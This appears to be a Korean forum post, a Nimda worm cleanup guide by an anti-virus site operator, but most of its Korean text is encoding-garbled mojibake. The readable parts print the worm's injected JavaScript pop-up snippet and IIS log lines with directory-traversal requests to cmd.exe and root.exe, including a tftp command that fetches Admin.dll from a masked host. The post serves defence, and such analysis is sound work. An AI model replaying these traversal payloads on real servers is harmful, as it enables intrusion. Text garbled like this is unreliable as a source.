ÀÚÀ¯·Ó°Ô °Ô½Ã¹°À» ¿Ã¸±¼öÀÖ´Â °Ô½ÃÆÇÀÔ´Ï´Ù.
  • À¯³âÃß¾ï
  • Çб³»ýÈ°
  • ÀÔ½ÃÁغñ
  • ´ëÇлýÈ°
  • ±º»ýÈ°
  • ¾Ë¹Ù»ýÈ°
  • Ãë¾÷Áغñ
  • Á÷Àå»ýÈ°
  • ¿ø·ë»ýÈ°
  • ¿¬¾ÖÁß
  • °áÈ¥Áغñ
  • Áý¾È»ì¸²
  • Àڳ౳À°
  • â¾÷Áغñ
  • À̹ÎÀ¯ÇÐ
  • ³ëÈÄ»ýÈ°
  • Àüüº¸±â


´Ô´Ù ¹ÙÀÌ·¯½º Ä¡·á ¹æ¹ý

 

¾È³çÇϼ¼¿ä.
ANTI CIH ¹ÙÀÌ·¯½º ȨÆäÀÌÁö //www.ebo.co.kr/cih °ü¸®ÀÚ ±è¿µºó ÀÔ´Ï´Ù.

Nimda ¿ú ¶ó´Â ¹ÙÀÌ·¯½º·Î½á ¾Æ¿ô·è ÁÖ¼Ò·ÏÀ» °Ë»öÇÏ¿© »ç¿ëÀÚ¿¡°Ô readme.exe, readme.exe (¼ýÀÚ), sample.exe ÆÄÀÏÀ» ÷ºÎÇÏ¿© ¸ÞÀÏÀ» ¹ß¼ÛÀ» Çϸç. Àбâ/¾²±â °¡´ÉÇϵµ·Ï °øÀ¯µÈ ÄÄÇ»ÅÍÀÇ °æ¿ì ³×Æ®¿öÅ©¸¦ ÅëÇؼ­µµ ÀüÆĵ˴ϴÙ. ±×¸®°í °¢ Æú´õ¸¶´Ù ³» ¹®¼­(My Documents) ¿¡ ÀÖ´Â ÆÄÀÏÀ» *.eml ȤÀº *.nws ÆÄÀÏ·Î »ý¼ºÇÕ´Ï´Ù. »ç¿ëÀÚ ÄÄÇ»ÅÍÀÇ ¸ðµç µå¶óÀ̺긦 °øÀ¯½ÃŲ´Ù.(°øÀ¯¸¦ ÇØÁ¦Çصµ ÀçºÎÆýÿ¡ ´Ù½Ã °øÀ¯°¡ µÊ)

Ȥ½Ã ÀÌ·± ¸ÞÀÏÀ» ¹ÞÀ¸½Å ºÐµéÀº Áï½Ã »èÁ¦¸¦ ºÎŹµå¸®¸ç, ÀÌ¹Ì ÆÄÀÏ Ã·ºÎµÈ readme.exe ÆÄÀÏÀ» ½ÇÇàÀ» ÇϽŠºÐµéÀÇ °æ¿ì´Â ¿À´Ã ³¯Â¥ÀÇ ÇϿ츮ÀÇ ¹ÙÀ̷κ¿ for MS-DOS (¸ÅÅ©·Î ¹ÙÀÌ·¯½º Áø´Ü/Ä¡·á ºÒ´É), ¶Ç´Â S&SÀÇ Turbo Vaccine 2001 (PV.6407) ·Î Ä¡·á ÇϽñ⠹ٶø´Ï´Ù.

¶Ç´Â ÇϿ츮¿¡¼­ ¹ßÇ¥ÇÑ Àü¿ë ¹é½Å [¸µÅ©1] [¸µÅ©2] [¸µÅ©3] [ÇϿ츮] À» »ç¿ëÇϽðųª
¾Èö¼ö ¿¬±¸¼Ò¿¡¼­ Á¦°øÇÑ Àü¿ë ¹é½Å [¸µÅ©1]
Æ®·£µå ¸¶ÀÌÅ©·Î¿¡¼­ Á¦°øÇÑ Àü¿ë ¹é½Å [¸µÅ©1]
½Ã¸¸ÅØ¿¡¼­ ¹ßÇ¥ÇÑ Àü¿ë ¹é½Å
mcafee ¿¡¼­ ¹ßÇ¥ÇÑ Àü¿ë ¹é½Å f-secure¿¡¼­ ¹ßÇ¥ÇÑ Àü¿ë ¹é½Å À» »ç¿ë ÇϽñ⠹ٶø´Ï´Ù,
ÇϿ츮 Á¦°ø ´Ô´Ù Àü¿ë ¿Â¶óÀÎ ¹é½Å : [¸µÅ©1] [¸µÅ©2] [¸µÅ©3] [ÇϿ츮]
¢Ñ MS ÆÐÄ¡ ´Ù¿î·Îµå »çÀÌÆ®
¢Ñ ¹ÙÀ̷κ¿ Code-X üÇèÆÇ ´Ù¿î·Îµå : ¹Ù·Î°¡±â
ÄÚµå ºí·ç ¿ú Àü¿ë¹é½Å
ÄÚµå ·¹µå ¿ú Àü¿ë¹é½Å »ç¿ë¹æ¹ý

¼öµ¿ Ä¡·á ¹æ¹ý

[À©µµ¿ì 95/98/ME °è¿­]


¢º °¨¿°°æ·Î
emailÀ» ÅëÇÑ Å¬¶óÀ̾ðÆ®¿¡¼­ Ŭ¶óÀ̾ðÆ®·Î
¿ÀÇÂµÈ ³×Æ®¿÷ÀÚ¿øÀ» ÅëÇÑ Å¬¶óÀ̾ðÆ®¿¡¼­ Ŭ¶óÀ̾ðÆ®·Î
°¨¿°µÈ À¥»çÀÌÆ® Á¢¼ÓÀ» ÅëÇÑ À¥¼­¹ö·Î¿¡¼­ Ŭ¶óÀ̾ðÆ®·Î
Microsoft IIS 4.0 / 5.0 directory traversal Ãë¾àÁ¡ ÅëÇÑ Å¬¶óÀ̾ðÆ®¿¡¼­ À¥¼­¹ö·Î
Code Red II¿Í sadmin/IIS ¿ú¿¡ ÀÇÇؼ­ ¸¸µé¾îÁø ¹éµµ¾î¸¦ ÅëÇÑ Å¬¶óÀ̾ðÆ®¿¡¼­ À¥¼­¹ö·Î

¢º Áõ»ó

1) °¨¿°µÈ Ŭ¶óÀ̾ðÆ®´Â Windows address book¿¡ ÀÖ´Â ¸ðµç ÁÖ¼Ò·Î Nimda ¿úÀ» Æ÷ÇÔÇÑ E-mailÀ» Àü¼ÛÇÏ·Á°í ½ÃµµÇÑ´Ù.

2) Code Red II¿Í sadmin/IIS ¿ú¿¡ ÀÇÇؼ­ ¸¸µé¾îÁø ¹éµµ¾î¸¦ ½ºÄ³´×ÇÏ¿© °ø°ÝÇϰųª, IIS Directory Traversal Ãë¾àÁ¡À» ÅëÇؼ­µµ ÀüÆÄ°¡´ÉÇÏ´Ù. °ø°ÝIP »ý¼º·êÀº ´ÙÀ½°ú °°´Ù.

50%´Â µ¿ÀÏÇÑ B class IP ÁÖ¼Ò(óÀ½µÎ°³ÀÇ octetÀÌ °°Àº IPÁÖ¼Ò)
25%´Â µ¿ÀÏÇÑ A class IP ÁÖ¼Ò(ù¹ø° octetÀÌ °°Àº IPÁÖ¼Ò)
25%´Â ·£´ýÇÑ IP ÁÖ¼Ò

3) °¨¿°µÈ Ŭ¶óÀ̾ðÆ® ½Ã½ºÅÛÀº Ãë¾àÁ¡À» ½ºÄµÇÏ¿© ¹ß°ßµÈ ¼­¹ö·Î Nimda Äڵ带 Àü¼ÛÇϸç, ¼­¹ö½Ã½ºÅÛÀÌ ÀÏ´Ü °¨¿°µÇ¸é ½Ã½ºÅÛÀÇ ¸ðµç µð·ºÅ丮¸¦ °¨¿°½ÃŲ´Ù(ÆÄÀÏ°øÀ¯¸¦ ÅëÇÑ ¿¢¼¼½º °¡´ÉÇÑ ¸ðµç ÆÄÀÏÀ» Æ÷ÇÔ). "README.EML" À̸§À» »ç¿ëÇؼ­ µð½ºÅ© ÀÚü¿¡ Ä«ÇÇÇÑ´Ù. ¶ÇÇÑ °¨¿°µÈ ½Ã½ºÅÛÀÇ C ·ÎÄà µå¶óÀ̺갡 °øÀ¯µÇ¹Ç·Î º¸¾È»ó ¹®Á¦°¡ µÉ ¼ö ÀÖ´Ù. À¥ÄÁÅÙÃ÷¸¦ Æ÷ÇÔÇÑ µð·ºÅ丮°¡ ¹ß°ßµÇ¾úÀ» ¶§, ´ÙÀ½ÀÇ Javascript Äڵ尡 À¥°ü·ÃÆÄÀÏ¿¡ Ãß°¡µÈ´Ù.

<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>

ÀÌ·¯ÇÑ À¥ÄÁÅÙÃ÷ÀÇ º¯°æÀº ³×Æ®¿÷ ÆÄÀϽýºÅÛÀ» ºê¶ó¿ì¡Çϰųª ºê¶ó¿ìÀú¸¦ ÅëÇØ »õ·Î¿î Ŭ¶óÀ̾ðÆ®¿¡°Ô ÀüÆĽÃŲ´Ù.

4) system.ini ÆÄÀÏÀ» ¾Æ·¡¿Í °°ÀÌ º¯°æÇÑ´Ù.

Shell = explorer.exe load.exe -dontrunold ¡æ Shell = explorer.exe

5) riched20.dllÀ» º¯°æÇÑ´Ù. riched20.dllÀº Microsoft Word°°Àº ÀÀ¿ëÇÁ·Î±×·¥¿¡¼­ »ç¿ëÇÏ´Â Windows .DllÆÄÀÏÀÌ´Ù. ÀÌ·¯ÇÑ .Dll ÆÄÀÏÀ» º¯°æÇÔÀ¸·Î¼­ Microsoft Word°°Àº ÀÀ¿ëÇÁ·Î±×·¥ÀÌ ½ÇÇàµÉ¶§ ¿úÀÌ ½ÇÇàµÇ¾îÁú ¼ö ÀÖ´Ù.

6) load.exe ÆÄÀÏÀÌ %WindowSystem%¿¡ ¼û±èÆÄÀϿɼÇÀ¸·Î »ý¼ºµÈ´Ù.(%WindowsSystem% Àº °¡º¯ÀûÀ̸ç, µðÆúÆ®´Â C:WindowsSystemÀÌ´Ù)

7) Windows Temporary Directory¿¡ ¾Æ·¡ÀÇ ÀÓ½ÃÆÄÀÏÀ» »ý¼ºÇÑ´Ù.

mep[nr][nr][letter][nr].TMP.exe
mep[nr][nr][letter][nr].TMP

8) ÀÏ´Ü Nimda¿¡ °¨¿°ÀÌ µÇ¸é, ¿úÀº °¨¿°½Ã½ºÅÛ¿¡ ¿ø°Ý°ø°ÝÀÚ·Î ÇÏ¿©±Ý ½Ã½ºÅÛ¿¡ Á¢±ÙÇÒ ¼ö ÀÖµµ·Ï ÇØÁÖ´Â °³Á¤À» ¸¸µëÀ¸ ·Î¼­ "backdoor"¸¦ ¸¸µé¼öµµ ÀÖ´Ù. "guest" °èÁ¤ÀÌ Á¸ÀçÇÏÁö ¾ÊÀ¸¸é "guest" °èÁ¤À» »ý¼ºÇϸç, "guest"°èÁ¤ÀÌ disable»óŶó¸é "guest"°èÁ¤À» È°¼ºÈ­½ÃŲ´Ù. "guest"°èÁ¤Àº "Guests"¿Í "Administators" group¿¡ Ãß°¡µÈ´Ù.(°¨¿°¹æ¹ý¿¡ µû¶ó¼­ Áõ»óÀÌ ´Þ¶óÁú ¼ö ÀÖ´Ù)

9) ¸ðµç µå¶óÀ̺갡 °øÀ¯ µÈ´Ù. (·¹Áö½ºÆ®¸® SoftwareMicrosoftWindowsCurrentVersionExplorerMapMai

¢º °¨¿°°æ·Î

1. EmailÀ» ÅëÇÑ ÀüÆÄ
ÀÌ ¿úÀº µÎ °³ÀÇ ¼½¼ÇÀ¸·Î ±¸¼ºµÈ MIME "multipart/alternative" ¸Þ½ÃÁö¸¦ ÅëÇØ ÀüÆĵȴÙ. ù ¹ø° ¼½¼ÇÀº MIME ŸÀÔ "text/html"À» Á¤ÀÇÇÏ°í ÀÖÀ¸¸ç ¾î¶°ÇÑ textµµ Æ÷ÇÔÇÏ°í ÀÖÁö ¾Ê´Ù. µû¶ó¼­ E-mailÀº ¾î¶°ÇÑ ÄÁÅÙÃ÷µµ Æ÷ÇÔÇÏ°í ÀÖÁö ¾Ê´Ù. µÎ ¹ø° ¼½¼ÇÀº MIME ŸÀÔ "audio/x-wav"¸¦ Á¤ÀÇÇÏ°í ÀÖÀ¸¸ç, base64·Î ¾ÏȣȭµÈ ½ÇÇà°¡´ÉÇÑ ¹ÙÀ̳ʸ® ÄÚµåÀÎ "readme.exe"À̸§ÀÇ ÆÄÀÏÀ» Æ÷ÇÔÇÏ°í ÀÖ´Ù.

"Automatic Execution of Embedded MIME Types" Ãë¾àÁ¡(//www.certcc.or.kr/advisory/ka2001/ka2001-025.txt)À» ÅëÇؼ­ HTML ¸ÞÀÏÀ» ÀÚµ¿À¸·Î ½ÇÇà½ÃÅ°´Â Microsoft Intetnet Explorer 5.5 SP1 À̳ª ±× ÀÌÀü¹öÀü(IE 5.01 SP2¸¦ Á¦¿ÜÇÑ)À» »ç¿ëÇÏ´Â x86 Ç÷§Æû»ó¿¡¼­ ±¸µ¿µÇ´Â ¸ÞÀÏ ¼ÒÇÁÆ®¿þ¼­´Â ÀÌ ¿ú¿¡ °¨¿°µÈ´Ù. µû¶ó¼­ ÀÌ ¿úÀº ÀÌ ¸ÞÀÏÀ» °£´ÜÈ÷ ¿­¾îº½À¸·Î¼­ ÀÚµ¿À¸·Î °¨¿°µÇ¸ç, ½ÇÇàÄÚµå±â ¶§¹®¿¡ ÷ºÎÆÄÀÏÀ» ½ÇÇà½ÃÅ´À¸·Î¼­ °£´ÜÈ÷ °¨¿°µÉ ¼ö ÀÖ´Ù.(Áï, ÷ºÎÆÄÀÏÀ» ½ÇÇà½ÃÅ°Áö ¾Ê°í ´Ü¼øÈ÷ ¸ÞÀÏÀ» Àб⸸Çصµ °¨¿°µÈ´Ù)

Nimda ¿úÀ» ÀüÆÄÇÏ´Â E-mailÀº ´ÙÀ½ÀÇ Æ¯Â¡À» °¡Áö°í ÀÖ´Ù.

¸ÞÀÏÀÇ Á¦¸ñ¶õÀÇ ¹®ÀÚ´Â °¡º¯ÀûÀÌÁö¸¸ 80¹®ÀÚ ÀÌ»óÀÌ´Ù.
÷ºÎµÈ ¹ÙÀ̳ʸ® ÆÄÀÏ¿¡ ±Ù¼ÒÇÑ Â÷ÀÌ°¡ ÀÖ´Ù. ÀÌ°ÍÀº MD5 ChecksumÀÌ ´Ù¸£±â ¶§¹®ÀÌ´Ù. ±×·¯³ª, ÷ºÎÆÄÀÏÀÇ ÆÄÀϱæÀÌ´Â ÀÏ°üµÇ°Ô 57344 ¹ÙÀÌÆ®ÀÌ´Ù.

2 ºê¶ó¿ìÀú ÀüÆÄ
Nimda¿úÀº ¸ðµç À¥ÄÁÅÙÃ÷ ÆÄÀÏ(index.htm, index.htm, index.asp, readme.html, readme.htm, readme.asp, main.html, main.htm, main.asp, default.html, default.htm, default.asp )À» º¯°æÇÏ°í readme.eml ÆÄÀÏÀ» º¹»çÇصдÙ. ±× °á°ú °¨¿°µÈ ½Ã½ºÅÛ¿¡ ÀÖ´Â À¥ÄÁÅÙÃ÷¸¦ ºê¶ó¿ì¡ÇÏ´Â »ç¿ëÀÚ´Â ¿ú(readme.eml)À» ´Ù¿î¹Þ´Â´Ù. ¸î¸î º¸¾È patch°¡ Àû¿ëµÇÁö ¾ÊÀº Internet Explorer ºê¶ó¿ìÀú´Â ´Ù¿î·Îµå¹ÞÀº ÆÄÀÏÀ» ÀÚµ¿À¸·Î ½ÇÇà½ÃÄѼ­ ½Ã½ºÅÛÀ» °¨¿°½ÃŲ´Ù.

3. File System ÀüÆÄ
Nimda ¿úÀº ¾²±â°¡´ÉÇÑ ¸ðµç µð·ºÅ丮(³×Æ®¿÷°øÀ¯¿¡¼­ ¹ß°ßµÇ´Â µð·ºÅ丮 Æ÷ÇÔ) ¿¡ README.EML À̸§ÀÇ ¼ö¸¹Àº Ä«ÇǸ¦ »ý¼ºÇÑ´Ù. ¸¸¾à ´Ù¸¥ ½Ã½ºÅÛÀÇ »ç¿ëÀÚ°¡ °øÀ¯µÈ ³×Æ®¿÷¿¡¼­ ¿úÆÄÀÏÀÇ Ä«ÇǺ»À» preview ¿É¼ÇÀÌ °¡´ÉÇÑ Windows Explorer¿¡¼­ ¼±ÅÃÇß´Ù¸é, ¿ú¿¡ °¨¿°µÉ ¼ö ÀÖ´Ù.

¢º Ä¡·á¹æ¹ý

C:WindowsSystem Æú´õ¿¡ load.exe(57,344¹ÙÀÌÆ®) ÆÄÀÏÀÌ Á¸ÀçÇÏ´ÂÁö È®ÀÎÇϽʽÿÀ.

1. Á¸ÀçÇÏÁö ¾ÊÀ» °æ¿ì

(1) °øÀ¯µÇ¾î ÀÖ´Â Æú´õ¸¦ ÇØÁ¦ÇÕ´Ï´Ù.
(2) ½Ã½ºÅÛ¿¡ *.eml ÆÄÀϵéÀÌ ÀÖ´ÂÁö È®ÀÎÇÏ¿© »èÁ¦ÇϽʽÿÀ.
(3) ½Ã½ºÅÛ¿¡ *.nwz ÆÄÀϵéÀÌ ÀÖ´ÂÁö È®ÀÎÇÏ¿© »èÁ¦ÇϽʽÿÀ.


2. Á¸ÀçÇÏ´Â °æ¿ì

(1) °øÀ¯µÇ¾î ÀÖ´Â Æú´õ¸¦ ÇØÁ¦ÇÕ´Ï´Ù.
(2) À©µµ¿ì [½ÃÀÛ]-[½ÇÇà]¿¡¼­ 'system.ini'¸¦ ÀÔ·ÂÇÕ´Ï´Ù.
(3) system.iniÀÇ ³»¿ë Áß 'Shell = explorer.exe load.exe -dontrunold'·Î µÇ¾î ÀÖ´Â ºÎºÐÀ» 'Shell = explorer.exe'·Î ¼öÁ¤ÇÕ´Ï´Ù.
(4) ½Ã½ºÅÛÀ» ÀçºÎÆÃÇÕ´Ï´Ù.
(5) C:WindowsSystem Æú´õ¿¡ ÀÖ´Â load.exe(57,344¹ÙÀÌÆ®) ÆÄÀÏÀ» »èÁ¦ÇÕ´Ï´Ù.
(6) C:WindowsSystem Æú´õ¿¡ ÀÖ´Â riched20.dll(57,344¹ÙÀÌÆ®, ¼û±è¼Ó¼º) ÆÄÀÏÀ» »èÁ¦ÇÕ´Ï´Ù.

load.exe¸¦ ã±âÀü¿¡ Ž»ö±âÀÇ
[º¸±â]-[Æú´õ¿É¼Ç]-[º¸±â]-[¸ðµçÆÄÀÏ Ç¥½Ã]¸¦ üũÇÏ¼Å¾ß ÇÕ´Ï´Ù.

- Á¤»óÀûÀÎ riched20.dll ÆÄÀÏÀÌ Á¸ÀçÇÒ ¼ö ÀÖÀ¸¹Ç·Î ¹Ýµå½Ã ÆÄÀÏÅ©±â¸¦ È®ÀÎÇÑ ÈÄ »èÁ¦ÇϽñ⠹ٶø´Ï´Ù.
(7) ½Ã½ºÅÛ¿¡ *.eml ÆÄÀϵéÀÌ ÀÖ´ÂÁö È®ÀÎÇÏ¿© »èÁ¦ÇϽʽÿÀ.
(8) ½Ã½ºÅÛ¿¡ *.nwz ÆÄÀϵéÀÌ ÀÖ´ÂÁö È®ÀÎÇÏ¿© »èÁ¦ÇϽʽÿÀ.

* °øÀ¯Æú´õ¸¦ ¼³Á¤ÇØ ³õÀ» °æ¿ì ³×Æ®¿öÅ©¸¦ ÅëÇØ Àç°¨¿°ÀÌ µÉ ¼ö ÀÖÀ¸¹Ç·Î, ¹Ýµå½Ã ÇØÁ¦ÇÏ°í »ç¿ëÇϽñ⠹ٶø´Ï´Ù.

Internet Explorer »ç¿ëÀÚÀÇ °æ¿ì ´ÙÀ½ ÆÐÄ¡¸¦ Àû¿ëÇϰųª
//www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp

Internet Explorer 5.01 SP2¸¦ ¼³Ä¡Çϰųª
Internet Explorer 5.5 SP2¸¦ ¼³Ä¡Çϰųª
Internet Explorer 6.0À» ¼³Ä¡ÇÕ´Ï´Ù

¢º Outlook 2000 »ç¿ëÀÚÀÇ °æ¿ì, ´ÙÀ½ ÆÐÄ¡¸¦ ¼³Ä¡ÇÕ´Ï´Ù

//office.microsoft.com/downloads/2000/outlctlx.aspx

¢º Outlook 2002 (Office XP) »ç¿ëÀÚÀÇ °æ¿ì, ´ÙÀ½ ÆÐÄ¡¸¦ ¼³Ä¡ÇÕ´Ï´Ù

//office.microsoft.com/downloads/2000/outlctlx.aspx

[ À©µµ¿ì 2000 / NT »ç¿ëÀÚ °æ¿ì ] -(À¥ ¼­¹ö °ü¸®ÀÚ Çʼö)

¢º ½Ã½ºÅÛ Áõ°Å
Æ÷Æ® 80/tcpÀ» ÅëÇÑ Web ¼­¹ö·Î±×

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..xc1x1c../..xc1x1c../..xc1x1c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe, /c+tftp%20-i%20xxx.xxx.xxx.xxx%20GET%20Admin.dll%20d:Admin.dll
GET /msadc/..%5c../..%5c../..%5c/..../..../..../Admin.dll
GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

Note: ù ¹ø° ³×ÁÙÀº Code Red II¿¡ ÀÇÇؼ­ ¸¸µé¾îÁø ¹éµµ¾î¸¦ °Ë»ö½ÃµµÇÏ´Â ·Î±×À̸ç, ³ª¸ÓÁö ·Î±×´Â Directory Traversal Ãë¾àÁ¡À» °ø°ÝÇϱâ À§ÇÑ ·Î±×ÀÌ´Ù.

¢º ¿µÇâ
°ø°ÝÀÚ´Â ÆÐÄ¡µÇÁö ¾ÊÀº IIS°¡ ±¸µ¿µÇ´Â ½Ã½ºÅÛÀÇ LocalSystem security context¿¡¼­ °ø°ÝÄڵ带 ½ÇÇà½Ãų ¼ö ÀÖÀ¸¸ç, °¨¿°µÈ È£½ºÆ®´Â ´Ù¸¥ ÀÎÅͳݻçÀÌÆ®¸¦ °ø°ÝÇÒ ¼ö ÀÖ´Ù. ¶ÇÇÑ Nimda ¿ú¿¡ ÀÇÇؼ­ ¹ß»ýÇÏ´Â ½ºÄ³´×Àº Dos°ø°ÝÀ» À¯¹ß½Ãų ¼ö ÀÖ´Ù.


¢º Ä¡·á¹æ¹ý

root.exe (Code Red II ȤÀº sadmin/IIS ¿ú¿¡ ÀÇÇؼ­ °ø°Ý´çÇÑ Áõ°Å)
admin.dll ȤÀº ±â´ëµÇÁö ¾ÊÀº .eml ÆÄÀÏ(À¥ ÄÁÅÙÃ÷¸¦ Æ÷ÇÔÇÏ°í ÀÖ´Â µð·ºÅ丮³»¿¡)
o ´ÙÀ½Àº Á¤»óÀûÀÎ ÆÄÀÏÀÔ´Ï´Ù.
- c:inetPubwwwroot_vti-bin_vti_admadmin.dll
- c:Program FilesMicrosoft FrontPageversion3.0isapi_vti-bin_vti_admadmin.dll

°¡Àå ¾ÈÀüÇÑ ½Ã½ºÅÛ º¹±¸¹æ¹ýÀº ½Ã½ºÅÛÀ» Æ÷¸ËÇÏ°í ÀçÀνºÅçÇÏ´Â °ÍÀÔ´Ï´Ù.
µ¡ºÙ¿© ¼ÒÇÁÆ®¿þ¾î¸¦ ÀçÀνºÅçÇÑÈÄ¿¡´Â ³×Æ®¿÷¿¡ Á¢¼ÓÇÏÁö ¾ÊÀº »óÅ¿¡¼­ ¸ðµç Á¦Ç°»ç°¡ Á¦°øÇÏ´Â º¸¾ÈÆÐÄ¡¸¦ Àû¿ëÇϽñ⠹ٶø´Ï´Ù.

IIS À¥ ¼­¹ö¸¦ ¿î¿µÇÒ °æ¿ì ¾Æ·¡ÀÇ ³»¿ëÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿© ¿úÀÌ ÀüÆĵDZ⵵ ÇÑ´Ù. µû¶ó¼­ ´ÙÀ½ÀÇ Ãë¾àÁ¡¿¡ ´ëÇÑ ÆÐÄ¡¸¦ ÇØÁÖ¾î¾ßÇÑ´Ù.

//www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-044.asp

* ¿úÀÌ Ã·ºÎµÈ ¸ÞÀÏÀ»(¶Ç´Â È®ÀåÀÚ *.NWS ÆÄÀÏÀ») Àб⸸ Çϰųª ¹Ì¸®º¸±â ÇÏ¿©µµ ¿ú¿¡ °¨¿°µÇ´Â °ÍÀº "Incorrect MIME Header Can Cause IE to Execute E-mailAttachment" Ãë¾àÁ¡ ¶§¹®ÀÌ¸ç ´ÙÀ½ÀÇ »çÀÌÆ®¸¦ Âü°íÇϵµ·Ï ÇÑ´Ù.

//www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp

ÄÚµå ºí·ç ¿ú Àü¿ë¹é½Å À» »ç¿ëÇÑ´Ù.
DuBa_CodeBlue.exe

Micrrosoft IIS 4.0 (À©µµ¿ì NT):
//www.microsoft.com/Downloads/Release.asp?ReleaseID=32061

Microsoft IIS 5.0 (À©µµ¿ì 2000 ¼­¹ö):
//www.microsoft.com/Windows2000/download.asp

IIS¼­¹ö ¿î¿µÀ» Áß´Ü(¸ðµç ÀÎÅͳÝÁ¤º¸¼­ºñ½º)½ÃŲÈÄ Norton anti virus»ç¿ëÀÚ´Â ÇØ´ç ¼­ºñ½º¸¦ ¸ØÃáÈÄ À©µµ¿ì ½ÃÀÛÈÄ ÀÚµ¿°Ë»ç½ÇÇà ¿É¼Ç Ã¼Å©ÇÏÁö ¸¶½Ã°í ÀçºÎÆÃÈÄ ÇØ´çÆÄÀϵéÀ» ¸ðµÎ »èÁ¦½ÃÄÑÁÝ´Ï´Ù.
±×·¯¸é ÄÄÇ»ÅÍ ¸®¼Ò½º¸¦ Àâ¾Æ¸Ô´Â ÀÏÀº ÇÏÁö ¾ÊÀ»°ÍÀÔ´Ï´Ù.
1. °¢ µå¶óÀ̺꿡 admin.dll
2. °¢ µå¶óÀ̺꿡 t~~·Î ½ÃÀÛÇÏ¿© ½×¿©ÀÖ´Â ¸ðµç ÆÄÀϵé
3. winnt/temp¿¡ t_·Î ½ÃÀÛÇÏ¿© ½×¿©ÀÖ´Â ¸ðµç ÆÄÀϵé
4. inetpub/script¿¡ ½×¿©ÀÖ´Â ¸ðµç ÆÄÀϵé
5. ¸ðµç µå¶óÀ̺ê(°¢ ÇÏÀ§µð·ºÅ丮Æ÷ÇÔ)¿¡ *.eml, *.nwzÆÄÀϵé

Á¶Ä¡Àü : ÄÄÇ»ÅÍ°¡ ¹ö¹÷°Å¸°´Ù. ½Ã½ºÅÛ ¸®¼Ò½º¸¦ ¹«¾ùÀΰ¡ °è¼Ó »ç¿ëÇÏ°í ÀÖ°í Çϵåµð½ºÅ©¿¡ ºÒÇÊ¿äÇÑ ÆÄÀϵéÀÌ ½×¿©°£´Ù.

Á¶Ä¡ÈÄ : ÄÄÇ»ÅÍ ¸®¼Ò½º¿¡ ´ëÇÏ¿© »ç¿ë½Ã ´À³¥¼ö ÀÖ´Â ºÎºÐÀÌ ¾ø´Ù.
´Ù½Ã Çϵåµå¶óÀ̺꿡 Nimda¿Í °ü·ÃÇÑ ÆÄÀϵéÀÌ »ý¼ºµÇÁö ¾Ê´Â´Ù.

¢º ¹ÌÇØ°á ¹®Á¦Á¡
1. ÀÌ ´Ü°è¿¡¼­ IIS¼­¹ö¸¦ Àç½ÃÀÛÇÏ¸é ´Ù½Ã Ã³À½ »óȲÀ¸·Î µ¹¾Æ°£´Ù.
2. ¾î¶² ¿£Áø¿¡ ÀÇÇÏ¿© À¥¼­¹ö Rootµð·ºÅ丮¿¡ ÀÖ´Â default,main¸íÀ¸·Î È®ÀåÀÚ(htm,html,asp)ÆÄÀϵéÀÌ ÀÏÁ¤½Ã°£ÈÄ ÀÚµ¿À¸·Î ¹Ø¿¡ readme.emlÆÄÀÏÀ» ¿ÀǽÃÅ°´Â ½ºÅ©¸³Æ®°¡ µé¾î°£´Ù.
¡æ Âü°í»çÇ×
¾ÆÁ÷ ½ÇÇèÀº ¸øÇغÃÁö¸¸ °³ÀÎÀûÀÎ ÃßÃøÀ¸·Î´Â ·çÆ®µð·ºÅ丮¿¡ ÀúÆÄÀϸíÀ» °¡Áø ÆÄÀϵ鿡 Timer¸¦ °É¾î ÀÏÁ¤½Ã°£À» ÁÖ±â·Î °è¼Ó readme.emlÆÄÀÏÀ» ½ÇÇà½ÃÅ°´Â ½ºÅ©¸³Æ®°¡ µé¾î°¡°í ÀÌÈÄ¿¡ À¥¼­¹ö¿¡ Á¢±ÙÇÑ »ç¿ëÀÚ°¡ Àú ÆÄÀÏÀ» ½ÇÇà½ÃÅ°¸é¼­ ¿ÀǽºÅ©¸³Æ®°¡ ¾Èµé¾î°£ ÆäÀÌÁö¸¦ ¿­¾îº¸¸é ½ºÅ©¸³Æ®°¡ Ãß°¡ µÈ´Ù°í ÃßÃøµÊ

1.mmc.exe ÆÄÀÏ°¨¿°...
¾ÈµÇ¸é °Á ´Ù½Ã ¼Â¾÷ÇϽÉÀÌ..... ´Ù½Ã ¼³Ä¡ÇÕ´Ï´Ù... ±×·±µ¥ ´Ù½Ã ¼³Ä¡Çصµ ¾Æ·¡¿Í °°Àº ¹®Á¦°¡ »ý±æ ¼ö ÀÖ½À´Ï´Ù... ¤Ñ¤Ñ;; ¼öµ¿À¸·Î Àâ¾ÆÁÖ¼¼¿ä..

2. admin.dll 56kb ÆÄÀÏ »ý¼º...
¹é½ÅÀ¸·Î Ä¡·áÇصµ °è¼Ó »ý¼ºµÇ´Â °æ¿ì...
